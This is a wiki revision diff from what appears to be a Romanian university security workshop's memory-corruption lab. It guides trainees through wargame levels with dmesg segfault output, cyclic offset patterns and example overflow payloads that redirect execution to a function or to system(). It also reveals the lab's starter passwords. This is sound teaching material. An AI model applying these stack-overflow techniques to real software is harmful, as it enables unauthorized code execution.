Pagini
Workshops
Organizatori
Parteneri
Differences
This shows you the differences between two versions of the page.
| Both sides previous revision Previous revision Next revision | Previous revision | ||
|
sesiuni:memory:4 [2013/07/11 04:36] rcaragea [Gdb tricks you might need] |
sesiuni:memory:4 [2013/07/12 15:21] rcaragea [Hijacking control flow] |
||
|---|---|---|---|
| Line 19: | Line 19: | ||
| * Your goal is to 'trick' the application into reading the content of that file | * Your goal is to 'trick' the application into reading the content of that file | ||
| * After you obtain the password you can advance to the next level by switching to that user | * After you obtain the password you can advance to the next level by switching to that user | ||
| - | * You are initially given the password to log into randmin_01 and gatekeeper_01 | + | * You are initially given the password to log into randmin_01: "1234" and gatekeeper_01: "4321" |
| == Categories == | == Categories == | ||
| Line 26: | Line 26: | ||
| * **gatekeeper_01** | * **gatekeeper_01** | ||
| * **gatekeeper_02** | * **gatekeeper_02** | ||
| - | * **gatekeeper_03** | + | * **gatekeeper_03** (Bonus) |
| Category 2 (memory corruption) | Category 2 (memory corruption) | ||
| Line 86: | Line 86: | ||
| **NOTE**: The segmentation fault is expected as that address is not mapped into the process address space. | **NOTE**: The segmentation fault is expected as that address is not mapped into the process address space. | ||
| + | |||
| + | |||
| == Gdb tricks you might need == | == Gdb tricks you might need == | ||
| - | Check the [[sesiuni:memory:gdb|]] | + | Check the [[sesiuni:memory:gdb|]] especially in the 'information' and 'various useful stuff' sections |
| + | |||
| + | |||
| + | == Hijacking control flow == | ||
| + | * The exact location of a segfault is written in the kernel log. You can view it with dmesg (you'll only need the last line) | ||
| + | |||
| + | <code bash> | ||
| + | randmin_01@102lin:~$ ./randmin_01 | ||
| + | Enter the password: | ||
| + | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA | ||
| + | You entered: | ||
| + | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA | ||
| + | You are not the Randministrator! | ||
| + | This unauthorized attempt will be logged. | ||
| + | Segmentation fault | ||
| + | randmin_01@102lin:~$ dmesg|tail -1 | ||
| + | [ 5277.100200] randmin_01[5839]: segfault at 41414141 ip 0000000041414141 sp 00000000ffffd370 error 14 | ||
| + | randmin_01@102lin:~$ | ||
| + | </code> | ||
| + | |||
| + | * You can use a pattern so that you can easily see what was written into the return address instead of trial and error. | ||
| + | <code bash> | ||
| + | randmin_01@102lin:~$ ./randmin_01 | ||
| + | Enter the password: | ||
| + | Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5 | ||
| + | You entered: | ||
| + | Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5 | ||
| + | You are not the Randministrator! | ||
| + | This unauthorized attempt will be logged. | ||
| + | Segmentation fault | ||
| + | randmin_01@102lin:~$ dmesg|tail -1 | ||
| + | [ 5481.155852] randmin_01[5853]: segfault at 64413764 ip 0000000064413764 sp 00000000ffffd370 error 14 | ||
| + | </code> | ||
| + | |||
| + | |||
| + | * When you want to jump to a function that takes no arguments you only need to append its address to the exploit pattern | ||
| + | <code c> | ||
| + | ... | ||
| + | int f() | ||
| + | { | ||
| + | printf("Hello\n"); | ||
| + | return 42; | ||
| + | } | ||
| + | ... | ||
| + | </code> | ||
| + | * If the address of the function is 0x0804849c your exploit pattern will look like "AAAAAA...AAA\x9c\x84\x04\x08" because calling this function will look like | ||
| + | <code asm> | ||
| + | ... | ||
| + | call 804849c <f> | ||
| + | ... | ||
| + | </code> | ||
| + | * For tasks randmin_03 and up you will need to call system(char *cmd) | ||
| + | <code c> | ||
| + | ... | ||
| + | int f(char *str) | ||
| + | { | ||
| + | printf("%s\n", str); | ||
| + | return 42; | ||
| + | } | ||
| + | ... | ||
| + | </code> | ||
| + | * Translated to asm: | ||
| + | <code asm> | ||
| + | ... | ||
| + | movl $0x80485a0,(%esp) (0x80485a0 is the address of the string parameter) | ||
| + | call 804849c <f> | ||
| + | ... | ||
| + | </code> | ||
| + | * Because 'call' also pushes 4 bytes on the stack the parameter is offset by exactly 4 bytes, so if you want to call f with the address of that string your exploit should look like "AAAAAA...AAA\x9c\x84\x04\x08ABCD\xa0\x85\x04\x08" where ABCD is the 4 byte value mentioned (any value will work) | ||
| + | |||
| + | == Tools you will need == | ||
| + | * gdb | ||
| + | * nm | ||
| + | * ldd | ||
| + | * objdump | ||
| + | * ulimit | ||
| + | * checksec.sh [[http://www.trapkit.de/tools/checksec.sh]] | ||
| + | * <del> aslr_brute_helper.py [[http://swarm.cs.pub.ro/~rcaragea/aslr_brute_helper.py]] </del> | ||